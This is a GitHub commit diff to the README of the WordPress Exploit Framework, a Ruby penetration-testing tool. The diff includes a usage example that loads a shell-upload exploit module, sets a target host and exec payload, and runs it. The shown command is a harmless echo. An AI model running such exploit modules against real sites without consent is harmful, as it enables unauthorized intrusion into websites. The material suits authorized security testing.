Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 50dcece

Browse files
authored
Update README.md
1 parent cdc97bf commit 50dcece

File tree

1 file changed

+8
-8
lines changed

1 file changed

+8
-8
lines changed

README.md

Lines changed: 8 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@
44
A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
55

66
### What do I need to run it?
7-
Ensure that you have Ruby >= 2.4.2 installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running ```bundle install```.
7+
Ensure that you have Ruby >= 2.4.3 installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running ```bundle install```.
88

99
If bundler is not present on your system, you can install it by running ```gem install bundler```.
1010

@@ -37,27 +37,27 @@ Loading a module into your environment will allow you to set options with the ``
3737
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
3838

3939
```
40-
wpxf > use exploit/symposium_shell_upload
40+
wpxf > use exploit/shell/symposium_shell_upload
4141
4242
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
4343
44-
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
44+
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
4545
4646
[+] Set host => wp-sandbox
4747
48-
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
48+
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
4949
5050
[+] Set target_uri => /wordpress/
5151
52-
wpxf [exploit/symposium_shell_upload] > set payload exec
52+
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
5353
5454
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
5555
56-
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
56+
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
5757
5858
[+] Set cmd => echo "Hello, world!"
5959
60-
wpxf [exploit/symposium_shell_upload] > run
60+
wpxf [exploit/shell/symposium_shell_upload] > run
6161
6262
[-] Preparing payload...
6363
[-] Uploading the payload...
@@ -87,7 +87,7 @@ All these payloads, with the exception of ```custom``` and the Meterpreter paylo
8787
Guides on writing modules and payloads can be found on [The Wiki](https://github.com/rastating/wordpress-exploit-framework/wiki) and full documentation of the API can be found at http://www.getwpxf.com/.
8888

8989
## License
90-
Copyright (C) 2015 rastating
90+
Copyright (C) 2015-2018 rastating
9191

9292
Running WordPress Exploit Framework against websites without prior mutual consent may be illegal in your country. The author and parties involved in its development accept no liability and are not responsible for any misuse or damage caused by WordPress Exploit Framework.
9393

0 commit comments

Comments
 (0)